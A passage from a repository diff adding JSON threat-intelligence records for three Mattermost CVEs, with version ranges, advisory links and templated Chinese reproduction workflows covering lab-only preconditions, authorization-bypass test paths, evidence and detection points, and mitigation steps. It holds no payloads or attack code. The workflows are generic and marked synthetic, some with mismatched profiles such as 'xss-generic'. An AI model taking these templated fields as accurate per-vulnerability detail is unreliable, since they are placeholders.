"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260123211116-9efe617be8b8",
"5.3.2-0.20260123211116-9efe617be8b8",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260123211116-9efe617be8b8",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"https://github.com/advisories/GHSA-ph22-fw5m-w2q9",
"https://github.com/mattermost/mattermost/commit/9efe617be8b8f1d036e12721e8e73b69a543ed34",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260123211116-9efe617be8b8",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260123211116-9efe617be8b8"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2457--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8, introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8, introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260123211116-9efe617be8b8`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2457--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2458.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2458",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost allows a removed team member to enumerate all public channels within a private team",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly validate team membership when searching channels which allows a removed team member to enumerate all public channels within a private team via the channel search API endpoint. Mattermost Advisory ID: MMSA-2025-00568",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:02.455815Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-679f-wmrg-qf57",
"https://github.com/mattermost/mattermost/commit/a18b80ba4c324b74b3d47951c33957305af4a099",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2458",
"GO-2026-4729",
"GHSA-679f-wmrg-qf57"
],
"cve_ids": [
"CVE-2026-2458"
],
"ghsa_ids": [
"GHSA-679f-wmrg-qf57"
],
"osv_ids": [
"GHSA-679f-wmrg-qf57",
"GO-2026-4729"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260113182106-a18b80ba4c32",
"5.3.2-0.20260113182106-a18b80ba4c32",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2458.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260113182106-a18b80ba4c32",
"5.3.2-0.20260113182106-a18b80ba4c32",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260113182106-a18b80ba4c32",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"https://github.com/advisories/GHSA-679f-wmrg-qf57",
"https://github.com/mattermost/mattermost/commit/a18b80ba4c324b74b3d47951c33957305af4a099",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260113182106-a18b80ba4c32",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260113182106-a18b80ba4c32"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2458--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32, introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32",
"introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260113182106-a18b80ba4c32, introduced=0, fixed<5.3.2-0.20260113182106-a18b80ba4c32, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260113182106-a18b80ba4c32`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2458--workflow"
}
}

232
08-threat-intel/registry/advisories/mattermost--CVE-2026-2463.json 普通文件
查看文件

@@ -0,0 +1,232 @@
{
"canonical_id": "mattermost--CVE-2026-2463",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to filter invite IDs based on user permissions",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to filter invite IDs based on user permissions, which allows regular users to bypass access control restrictions and register unauthorized accounts via leaked invite IDs during team creation. Mattermost Advisory ID: MMSA-2025-00565",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:08.610141Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-fx49-m253-27jj",
"https://github.com/mattermost/mattermost/commit/cc427af41b2a8d3a552d8dc42978831dcfecc1d8",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2463",
"GO-2026-4735",
"GHSA-fx49-m253-27jj"
],
"cve_ids": [
"CVE-2026-2463"
],
"ghsa_ids": [
"GHSA-fx49-m253-27jj"
],
"osv_ids": [
"GHSA-fx49-m253-27jj",
"GO-2026-4735"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260105134819-cc427af41b2a",
"5.3.2-0.20260105134819-cc427af41b2a",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2463.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260105134819-cc427af41b2a",
"5.3.2-0.20260105134819-cc427af41b2a",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260105134819-cc427af41b2a",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"https://github.com/advisories/GHSA-fx49-m253-27jj",
"https://github.com/mattermost/mattermost/commit/cc427af41b2a8d3a552d8dc42978831dcfecc1d8",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260105134819-cc427af41b2a",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260105134819-cc427af41b2a"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2463--workflow",
"vuln_family": "authz-bypass",
"entry_surface": "privileged-route-or-object-reference",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a, introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "cross-tenant-or-low-privileged-user",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a",
"introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `authz-bypass` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/*",
"/api/private/*",
"/tenant/*"
],
"input_shape": "\u4f7f\u7528\u4f4e\u6743\u9650\u8eab\u4efd\u8bbf\u95ee\u9ad8\u6743\u9650\u5bf9\u8c61\u6216\u8de8\u79df\u6237\u8d44\u6e90\u3002",
"expected_unsafe_behavior": "\u4f4e\u6743\u9650\u8eab\u4efd\u53ef\u8bbf\u95ee\u672c\u4e0d\u5e94\u53ef\u89c1\u7684\u6570\u636e\u6216\u64cd\u4f5c\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
